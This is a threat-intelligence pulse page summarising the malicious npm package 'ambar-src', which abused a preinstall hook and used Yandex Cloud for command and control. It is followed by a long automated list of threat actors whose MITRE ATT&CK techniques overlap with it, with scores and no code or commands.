Trusted Design

New malicious npm package 'ambar-src' targets developers with open source malware

概要

A malicious npm package named "ambar-src" reached 50,000 downloads in days before being removed from the registry. It uses a preinstall script to execute malicious code during installation, targeting Windows, Linux, and macOS systems. The package employs detection evasion techniques and deploys powerful open-source malware variants. It abuses npm's preinstall script hook to trigger the payload without explicit invocation. The malware fetches additional payloads from remote servers and uses Yandex Cloud for command and control. Affected systems should be considered fully compromised, requiring immediate incident response actions. The attack highlights the speed at which supply chain risks can propagate and confirms that npm install is a high-risk action.

Created: 2026-02-27

Indicators

類似Pulses

類似するPulseは見つかりませんでした。

このPulseに関連する脅威アクター (事実ベース)

Mustang Panda

Score: 59.61
Matched TTPs:
  • T1129 - Shared Modules
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1574.001 - DLL
  • T1608.001 - Upload Malware
  • T1176.002 - IDE Extensions
  • T1016 - System Network Configuration Discovery
  • T1574.005 - Executable Installer File Permissions Weakness
  • T1059 - Command and Scripting Interpreter
  • T1218.005 - Mshta
  • T1608 - Stage Capabilities
  • T1027.012 - LNK Icon Smuggling
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1593 - Search Open Websites/Domains
  • T1678 - Delay Execution
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1070.004 - File Deletion
  • T1518 - Software Discovery
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Winnti Group

Score: 3.29
Matched TTPs:
  • T1014 - Rootkit
MITREへのリンク →

APT41

Score: 59.95
Matched TTPs:
  • T1014 - Rootkit
  • T1003.002 - Security Account Manager
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1055 - Process Injection
  • T1595.002 - Vulnerability Scanning
  • T1555.003 - Credentials from Web Browsers
  • T1574.006 - Dynamic Linker Hijacking
  • T1016 - System Network Configuration Discovery
  • T1546.008 - Accessibility Features
  • T1090 - Proxy
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool
  • T1218.001 - Compiled HTML File
  • T1486 - Data Encrypted for Impact
  • T1195.002 - Compromise Software Supply Chain
  • T1203 - Exploitation for Client Execution
  • T1595.003 - Wordlist Scanning
  • T1213.003 - Code Repositories
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
  • T1596.005 - Scan Databases
  • T1480.001 - Environmental Keying
MITREへのリンク →

Rocke

Score: 29.30
Matched TTPs:
  • T1014 - Rootkit
  • T1070.002 - Clear Linux or Mac System Logs
  • T1071 - Application Layer Protocol
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1574.006 - Dynamic Linker Hijacking
  • T1027.004 - Compile After Delivery
  • T1518.001 - Security Software Discovery
  • T1059.006 - Python
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
MITREへのリンク →

TeamTNT

Score: 42.05
Matched TTPs:
  • T1014 - Rootkit
  • T1587.001 - Malware
  • T1070.002 - Clear Linux or Mac System Logs
  • T1007 - System Service Discovery
  • T1071 - Application Layer Protocol
  • T1608.001 - Upload Malware
  • T1036 - Masquerading
  • T1562.004 - Disable or Modify System Firewall
  • T1595.002 - Vulnerability Scanning
  • T1610 - Deploy Container
  • T1016 - System Network Configuration Discovery
  • T1552.001 - Credentials In Files
  • T1518.001 - Security Software Discovery
  • T1070.004 - File Deletion
  • T1595.001 - Scanning IP Blocks
  • T1027.002 - Software Packing
MITREへのリンク →

APT28

Score: 41.17
Matched TTPs:
  • T1014 - Rootkit
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1595.002 - Vulnerability Scanning
  • T1090.002 - External Proxy
  • T1583.006 - Web Services
  • T1591 - Gather Victim Org Information
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1589.001 - Credentials
  • T1203 - Exploitation for Client Execution
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1137.002 - Office Test
  • T1211 - Exploitation for Defense Evasion
MITREへのリンク →

UNC3886

Score: 53.35
Matched TTPs:
  • T1014 - Rootkit
  • T1587.001 - Malware
  • T1675 - ESXi Administration Command
  • T1070.007 - Clear Network Connection History and Configurations
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1681 - Search Threat Vendor Data
  • T1673 - Virtual Machine Discovery
  • T1588.001 - Malware
  • T1036.004 - Masquerade Task or Service
  • T1554 - Compromise Host Software Binary
  • T1587.004 - Exploits
  • T1203 - Exploitation for Client Execution
  • T1059.006 - Python
  • T1059.012 - Hypervisor CLI
  • T1070.004 - File Deletion
  • T1505.006 - vSphere Installation Bundles
MITREへのリンク →

Daggerfly

Score: 12.31
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1574.001 - DLL
  • T1195.002 - Compromise Software Supply Chain
  • T1036.003 - Rename Legitimate Utilities
  • T1189 - Drive-by Compromise
MITREへのリンク →

GALLIUM

Score: 18.17
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
  • T1036.003 - Rename Legitimate Utilities
  • T1027.002 - Software Packing
MITREへのリンク →

APT29

Score: 35.51
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1090.002 - External Proxy
  • T1546.008 - Accessibility Features
  • T1218.005 - Mshta
  • T1021.007 - Cloud Services
  • T1583.006 - Web Services
  • T1588.002 - Tool
  • T1573 - Encrypted Channel
  • T1203 - Exploitation for Client Execution
  • T1059.006 - Python
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
MITREへのリンク →

FIN13

Score: 19.94
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1587.001 - Malware
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1552.001 - Credentials In Files
  • T1588.002 - Tool
  • T1090.001 - Internal Proxy
MITREへのリンク →

Dragonfly

Score: 33.18
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1595.002 - Vulnerability Scanning
  • T1016 - System Network Configuration Discovery
  • T1059 - Command and Scripting Interpreter
  • T1598.002 - Spearphishing Attachment
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1195.002 - Compromise Software Supply Chain
  • T1203 - Exploitation for Client Execution
  • T1059.006 - Python
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
MITREへのリンク →

Ke3chang

Score: 19.16
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1587.001 - Malware
  • T1583.005 - Botnet
  • T1007 - System Service Discovery
  • T1190 - Exploit Public-Facing Application
  • T1016 - System Network Configuration Discovery
  • T1059 - Command and Scripting Interpreter
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
MITREへのリンク →

Agrius

Score: 8.22
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1041 - Exfiltration Over C2 Channel
MITREへのリンク →

APT5

Score: 15.88
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1583.005 - Botnet
  • T1190 - Exploit Public-Facing Application
  • T1055 - Process Injection
  • T1554 - Compromise Host Software Binary
  • T1070.004 - File Deletion
MITREへのリンク →

menuPass

Score: 21.25
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1036.003 - Rename Legitimate Utilities
  • T1070.004 - File Deletion
MITREへのリンク →

Threat Group-3390

Score: 27.38
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1608.002 - Upload Tool
  • T1016 - System Network Configuration Discovery
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1195.002 - Compromise Software Supply Chain
  • T1203 - Exploitation for Client Execution
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1027.002 - Software Packing
MITREへのリンク →

Wizard Spider

Score: 24.65
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1204.002 - Malicious File
  • T1055 - Process Injection
  • T1518.002 - Backup Software Discovery
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1041 - Exfiltration Over C2 Channel
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
MITREへのリンク →

Ember Bear

Score: 31.55
Matched TTPs:
  • T1003.002 - Security Account Manager
  • T1195 - Supply Chain Compromise
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1595.002 - Vulnerability Scanning
  • T1588.001 - Malware
  • T1552.001 - Credentials In Files
  • T1210 - Exploitation of Remote Services
  • T1203 - Exploitation for Client Execution
  • T1070.004 - File Deletion
  • T1595.001 - Scanning IP Blocks
  • T1588.005 - Exploits
MITREへのリンク →

Sea Turtle

Score: 21.81
Matched TTPs:
  • T1583.002 - DNS Server
  • T1114.001 - Local Email Collection
  • T1213.006 - Databases
  • T1070.002 - Clear Linux or Mac System Logs
  • T1190 - Exploit Public-Facing Application
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1027.004 - Compile After Delivery
MITREへのリンク →

Axiom

Score: 20.02
Matched TTPs:
  • T1583.002 - DNS Server
  • T1190 - Exploit Public-Facing Application
  • T1546.008 - Accessibility Features
  • T1584.005 - Botnet
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1001.002 - Steganography
MITREへのリンク →

HEXANE

Score: 22.83
Matched TTPs:
  • T1583.002 - DNS Server
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1534 - Internal Spearphishing
  • T1588.002 - Tool
  • T1591.004 - Identify Roles
  • T1027.010 - Command Obfuscation
  • T1518 - Software Discovery
MITREへのリンク →

RedCurl

Score: 18.60
Matched TTPs:
  • T1114.001 - Local Email Collection
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1555.003 - Credentials from Web Browsers
  • T1552.001 - Credentials In Files
  • T1056.002 - GUI Input Capture
  • T1059.006 - Python
  • T1070.004 - File Deletion
MITREへのリンク →

APT1

Score: 10.59
Matched TTPs:
  • T1114.001 - Local Email Collection
  • T1007 - System Service Discovery
  • T1016 - System Network Configuration Discovery
  • T1588.001 - Malware
  • T1588.002 - Tool
MITREへのリンク →

Chimera

Score: 23.06
Matched TTPs:
  • T1114.001 - Local Email Collection
  • T1574.001 - DLL
  • T1007 - System Service Discovery
  • T1016 - System Network Configuration Discovery
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
  • T1589.001 - Credentials
  • T1556.001 - Domain Controller Authentication
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
MITREへのリンク →

Magic Hound

Score: 48.22
Matched TTPs:
  • T1114.001 - Local Email Collection
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1071 - Application Layer Protocol
  • T1562 - Impair Defenses
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1595.002 - Vulnerability Scanning
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1036.004 - Masquerade Task or Service
  • T1583.006 - Web Services
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1573 - Encrypted Channel
  • T1589.001 - Credentials
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1591.001 - Determine Physical Locations
MITREへのリンク →

Winter Vivern

Score: 21.33
Matched TTPs:
  • T1114.001 - Local Email Collection
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1595.002 - Vulnerability Scanning
  • T1059 - Command and Scripting Interpreter
  • T1036.004 - Masquerade Task or Service
  • T1041 - Exfiltration Over C2 Channel
  • T1584.006 - Web Services
  • T1189 - Drive-by Compromise
MITREへのリンク →

Kimsuky

Score: 59.13
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1007 - System Service Discovery
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1055 - Process Injection
  • T1562.004 - Disable or Modify System Firewall
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1552.001 - Credentials In Files
  • T1218.005 - Mshta
  • T1027.012 - LNK Icon Smuggling
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1591 - Gather Victim Org Information
  • T1534 - Internal Spearphishing
  • T1593 - Search Open Websites/Domains
  • T1588.002 - Tool
  • T1518.001 - Security Software Discovery
  • T1059.006 - Python
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
  • T1588.005 - Exploits
MITREへのリンク →

Moonstone Sleet

Score: 17.34
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1016 - System Network Configuration Discovery
  • T1591 - Gather Victim Org Information
  • T1486 - Data Encrypted for Impact
  • T1195.002 - Compromise Software Supply Chain
MITREへのリンク →

Indrik Spider

Score: 10.27
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1007 - System Service Discovery
  • T1552.001 - Credentials In Files
  • T1486 - Data Encrypted for Impact
MITREへのリンク →

Lazarus Group

Score: 46.47
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1218 - System Binary Proxy Execution
  • T1562.004 - Disable or Modify System Firewall
  • T1090.002 - External Proxy
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1591 - Gather Victim Org Information
  • T1588.002 - Tool
  • T1036.003 - Rename Legitimate Utilities
  • T1203 - Exploitation for Client Execution
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1027.007 - Dynamic API Resolution
  • T1090.001 - Internal Proxy
  • T1529 - System Shutdown/Reboot
MITREへのリンク →

Contagious Interview

Score: 40.84
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1036 - Masquerading
  • T1681 - Search Threat Vendor Data
  • T1090 - Proxy
  • T1204.005 - Malicious Library
  • T1583.006 - Web Services
  • T1041 - Exfiltration Over C2 Channel
  • T1593 - Search Open Websites/Domains
  • T1588.002 - Tool
  • T1059.006 - Python
  • T1543.001 - Launch Agent
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
  • T1204.004 - Malicious Copy and Paste
MITREへのリンク →

OilRig

Score: 39.28
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1497.001 - System Checks
  • T1007 - System Service Discovery
  • T1608.001 - Upload Malware
  • T1195 - Supply Chain Compromise
  • T1036 - Masquerading
  • T1562.004 - Disable or Modify System Firewall
  • T1555.003 - Credentials from Web Browsers
  • T1016 - System Network Configuration Discovery
  • T1059 - Command and Scripting Interpreter
  • T1552.001 - Credentials In Files
  • T1588.002 - Tool
  • T1218.001 - Compiled HTML File
  • T1203 - Exploitation for Client Execution
  • T1137.004 - Outlook Home Page
  • T1070.004 - File Deletion
MITREへのリンク →

LuminousMoth

Score: 14.93
Matched TTPs:
  • T1587.001 - Malware
  • T1574.001 - DLL
  • T1608.001 - Upload Malware
  • T1588.001 - Malware
  • T1608.005 - Link Target
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
MITREへのリンク →

Sandworm Team

Score: 49.70
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1213.006 - Databases
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1195 - Supply Chain Compromise
  • T1190 - Exploit Public-Facing Application
  • T1036 - Masquerading
  • T1595.002 - Vulnerability Scanning
  • T1555.003 - Credentials from Web Browsers
  • T1090 - Proxy
  • T1584.005 - Botnet
  • T1041 - Exfiltration Over C2 Channel
  • T1593 - Search Open Websites/Domains
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1195.002 - Compromise Software Supply Chain
  • T1203 - Exploitation for Client Execution
  • T1499 - Endpoint Denial of Service
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
MITREへのリンク →

Salt Typhoon

Score: 14.91
Matched TTPs:
  • T1587.001 - Malware
  • T1070.002 - Clear Linux or Mac System Logs
  • T1190 - Exploit Public-Facing Application
  • T1602.002 - Network Device Configuration Dump
  • T1562.004 - Disable or Modify System Firewall
  • T1588.002 - Tool
MITREへのリンク →

Play

Score: 11.03
Matched TTPs:
  • T1587.001 - Malware
  • T1190 - Exploit Public-Facing Application
  • T1016 - System Network Configuration Discovery
  • T1588.002 - Tool
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
MITREへのリンク →

Aoqin Dragon

Score: 9.47
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1036 - Masquerading
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1027.002 - Software Packing
MITREへのリンク →

Moses Staff

Score: 8.23
Matched TTPs:
  • T1587.001 - Malware
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1016 - System Network Configuration Discovery
  • T1588.002 - Tool
MITREへのリンク →

Turla

Score: 34.25
Matched TTPs:
  • T1587.001 - Malware
  • T1213.006 - Databases
  • T1007 - System Service Discovery
  • T1055 - Process Injection
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1588.001 - Malware
  • T1583.006 - Web Services
  • T1588.002 - Tool
  • T1584.006 - Web Services
  • T1518.001 - Security Software Discovery
  • T1059.006 - Python
  • T1027.010 - Command Obfuscation
  • T1189 - Drive-by Compromise
  • T1090.001 - Internal Proxy
MITREへのリンク →

FIN7

Score: 47.61
Matched TTPs:
  • T1587.001 - Malware
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1562.004 - Disable or Modify System Firewall
  • T1674 - Input Injection
  • T1059 - Command and Scripting Interpreter
  • T1036.004 - Masquerade Task or Service
  • T1218.005 - Mshta
  • T1608.005 - Link Target
  • T1583.006 - Web Services
  • T1497.002 - User Activity Based Checks
  • T1591 - Gather Victim Org Information
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1195.002 - Compromise Software Supply Chain
  • T1591.004 - Identify Roles
  • T1027.010 - Command Obfuscation
MITREへのリンク →

Medusa Group

Score: 29.97
Matched TTPs:
  • T1652 - Device Driver Discovery
  • T1190 - Exploit Public-Facing Application
  • T1608.002 - Upload Tool
  • T1562.004 - Disable or Modify System Firewall
  • T1016 - System Network Configuration Discovery
  • T1583.006 - Web Services
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
  • T1529 - System Shutdown/Reboot
MITREへのリンク →

Malteiro

Score: 4.74
Matched TTPs:
  • T1204.002 - Malicious File
  • T1555.003 - Credentials from Web Browsers
  • T1518.001 - Security Software Discovery
MITREへのリンク →

Machete

Score: 8.18
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.007 - Msiexec
  • T1059.006 - Python
  • T1189 - Drive-by Compromise
MITREへのリンク →

Elderwood

Score: 6.10
Matched TTPs:
  • T1204.002 - Malicious File
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
  • T1027.002 - Software Packing
MITREへのリンク →

Transparent Tribe

Score: 4.05
Matched TTPs:
  • T1204.002 - Malicious File
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
MITREへのリンク →

RTM

Score: 4.29
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1189 - Drive-by Compromise
MITREへのリンク →

APT-C-36

Score: 3.73
Matched TTPs:
  • T1204.002 - Malicious File
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool
MITREへのリンク →

CURIUM

Score: 10.61
Matched TTPs:
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1041 - Exfiltration Over C2 Channel
  • T1584.006 - Web Services
  • T1189 - Drive-by Compromise
MITREへのリンク →

Tropic Trooper

Score: 15.13
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1016 - System Network Configuration Discovery
  • T1573 - Encrypted Channel
  • T1203 - Exploitation for Client Execution
  • T1518.001 - Security Software Discovery
  • T1070.004 - File Deletion
  • T1518 - Software Discovery
MITREへのリンク →

Dark Caracal

Score: 8.05
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.001 - Compiled HTML File
  • T1189 - Drive-by Compromise
  • T1027.002 - Software Packing
MITREへのリンク →

PLATINUM

Score: 7.20
Matched TTPs:
  • T1204.002 - Malicious File
  • T1036 - Masquerading
  • T1055 - Process Injection
  • T1189 - Drive-by Compromise
MITREへのリンク →

TA551

Score: 7.18
Matched TTPs:
  • T1204.002 - Malicious File
  • T1036 - Masquerading
  • T1218.005 - Mshta
  • T1027.010 - Command Obfuscation
MITREへのリンク →

FIN8

Score: 13.66
Matched TTPs:
  • T1204.002 - Malicious File
  • T1055.004 - Asynchronous Procedure Call
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
MITREへのリンク →

BITTER

Score: 10.82
Matched TTPs:
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool
  • T1573 - Encrypted Channel
  • T1203 - Exploitation for Client Execution
MITREへのリンク →

APT37

Score: 16.86
Matched TTPs:
  • T1204.002 - Malicious File
  • T1055 - Process Injection
  • T1555.003 - Credentials from Web Browsers
  • T1059 - Command and Scripting Interpreter
  • T1203 - Exploitation for Client Execution
  • T1059.006 - Python
  • T1189 - Drive-by Compromise
  • T1529 - System Shutdown/Reboot
MITREへのリンク →

LazyScripter

Score: 13.62
Matched TTPs:
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1036 - Masquerading
  • T1588.001 - Malware
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1027.010 - Command Obfuscation
MITREへのリンク →

PROMETHIUM

Score: 4.65
Matched TTPs:
  • T1204.002 - Malicious File
  • T1036.004 - Masquerade Task or Service
  • T1189 - Drive-by Compromise
MITREへのリンク →

TA505

Score: 20.19
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.007 - Msiexec
  • T1608.001 - Upload Malware
  • T1555.003 - Credentials from Web Browsers
  • T1588.001 - Malware
  • T1552.001 - Credentials In Files
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1027.010 - Command Obfuscation
  • T1027.002 - Software Packing
MITREへのリンク →

APT39

Score: 23.41
Matched TTPs:
  • T1204.002 - Malicious File
  • T1059.010 - AutoHotKey & AutoIT
  • T1190 - Exploit Public-Facing Application
  • T1090.002 - External Proxy
  • T1059 - Command and Scripting Interpreter
  • T1041 - Exfiltration Over C2 Channel
  • T1588.002 - Tool
  • T1059.006 - Python
  • T1070.004 - File Deletion
  • T1027.002 - Software Packing
  • T1090.001 - Internal Proxy
MITREへのリンク →

Star Blizzard

Score: 12.98
Matched TTPs:
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1608.001 - Upload Malware
  • T1598.002 - Spearphishing Attachment
  • T1593 - Search Open Websites/Domains
  • T1588.002 - Tool
MITREへのリンク →

Higaisa

Score: 12.48
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1016 - System Network Configuration Discovery
  • T1036.004 - Masquerade Task or Service
  • T1041 - Exfiltration Over C2 Channel
  • T1203 - Exploitation for Client Execution
  • T1090.001 - Internal Proxy
MITREへのリンク →

Rancor

Score: 4.07
Matched TTPs:
  • T1204.002 - Malicious File
  • T1218.007 - Msiexec
MITREへのリンク →

FIN4

Score: 4.92
Matched TTPs:
  • T1204.002 - Malicious File
  • T1056.002 - GUI Input Capture
MITREへのリンク →

Cobalt Group

Score: 17.79
Matched TTPs:
  • T1204.002 - Malicious File
  • T1055 - Process Injection
  • T1218.003 - CMSTP
  • T1588.002 - Tool
  • T1195.002 - Compromise Software Supply Chain
  • T1203 - Exploitation for Client Execution
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
MITREへのリンク →

Storm-1811

Score: 12.44
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1036 - Masquerading
  • T1588.002 - Tool
  • T1486 - Data Encrypted for Impact
  • T1667 - Email Bombing
MITREへのリンク →

Inception

Score: 10.27
Matched TTPs:
  • T1204.002 - Malicious File
  • T1555.003 - Credentials from Web Browsers
  • T1218.005 - Mshta
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1518 - Software Discovery
MITREへのリンク →

EXOTIC LILY

Score: 4.25
Matched TTPs:
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1203 - Exploitation for Client Execution
MITREへのリンク →

Saint Bear

Score: 10.66
Matched TTPs:
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1059 - Command and Scripting Interpreter
  • T1583.006 - Web Services
  • T1203 - Exploitation for Client Execution
  • T1027.002 - Software Packing
MITREへのリンク →

FIN6

Score: 14.99
Matched TTPs:
  • T1204.002 - Malicious File
  • T1213.006 - Databases
  • T1555.003 - Credentials from Web Browsers
  • T1059 - Command and Scripting Interpreter
  • T1036.004 - Masquerade Task or Service
  • T1588.002 - Tool
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
MITREへのリンク →

Patchwork

Score: 18.34
Matched TTPs:
  • T1204.002 - Malicious File
  • T1598.003 - Spearphishing Link
  • T1574.001 - DLL
  • T1555.003 - Credentials from Web Browsers
  • T1588.002 - Tool
  • T1203 - Exploitation for Client Execution
  • T1518.001 - Security Software Discovery
  • T1027.010 - Command Obfuscation
  • T1070.004 - File Deletion
  • T1189 - Drive-by Compromise
  • T1027.002 - Software Packing
MITREへのリンク →

Whitefly

Score: 5.71
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1059 - Command and Scripting Interpreter
  • T1588.002 - Tool
MITREへのリンク →

APT19

Score: 10.81
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1016 - System Network Configuration Discovery
  • T1059 - Command and Scripting Interpreter
  • T1588.002 - Tool
  • T1027.010 - Command Obfuscation
  • T1189 - Drive-by Compromise
MITREへのリンク →

TA2541

Score: 16.83
Matched TTPs:
  • T1204.002 - Malicious File
  • T1608.001 - Upload Malware
  • T1055 - Process Injection
  • T1588.001 - Malware
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1588.002 - Tool
  • T1518.001 - Security Software Discovery
  • T1027.002 - Software Packing
MITREへのリンク →

Earth Lusca

Score: 33.03
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1007 - System Service Discovery
  • T1608.001 - Upload Malware
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1016 - System Network Configuration Discovery
  • T1090 - Proxy
  • T1588.001 - Malware
  • T1218.005 - Mshta
  • T1583.006 - Web Services
  • T1210 - Exploitation of Remote Services
  • T1588.002 - Tool
  • T1584.006 - Web Services
  • T1059.006 - Python
  • T1189 - Drive-by Compromise
MITREへのリンク →

SideCopy

Score: 16.57
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1608.001 - Upload Malware
  • T1016 - System Network Configuration Discovery
  • T1218.005 - Mshta
  • T1598.002 - Spearphishing Attachment
  • T1518.001 - Security Software Discovery
  • T1518 - Software Discovery
MITREへのリンク →

Leviathan

Score: 20.99
Matched TTPs:
  • T1204.002 - Malicious File
  • T1190 - Exploit Public-Facing Application
  • T1595.002 - Vulnerability Scanning
  • T1041 - Exfiltration Over C2 Channel
  • T1534 - Internal Spearphishing
  • T1587.004 - Exploits
  • T1589.001 - Credentials
  • T1203 - Exploitation for Client Execution
  • T1189 - Drive-by Compromise
MITREへのリンク →

Tonto Team

Score: 11.85
Matched TTPs:
  • T1204.002 - Malicious File
  • T1574.001 - DLL
  • T1090.002 - External Proxy
  • T1210 - Exploitation of Remote Services
  • T1203 - Exploitation for Client Execution
  • T1059.006 - Python
MITREへのリンク →

Andariel

Score: 6.51
Matched TTPs:
  • T1204.002 - Malicious File
  • T1588.001 - Malware
  • T1203 - Exploitation for Client Execution
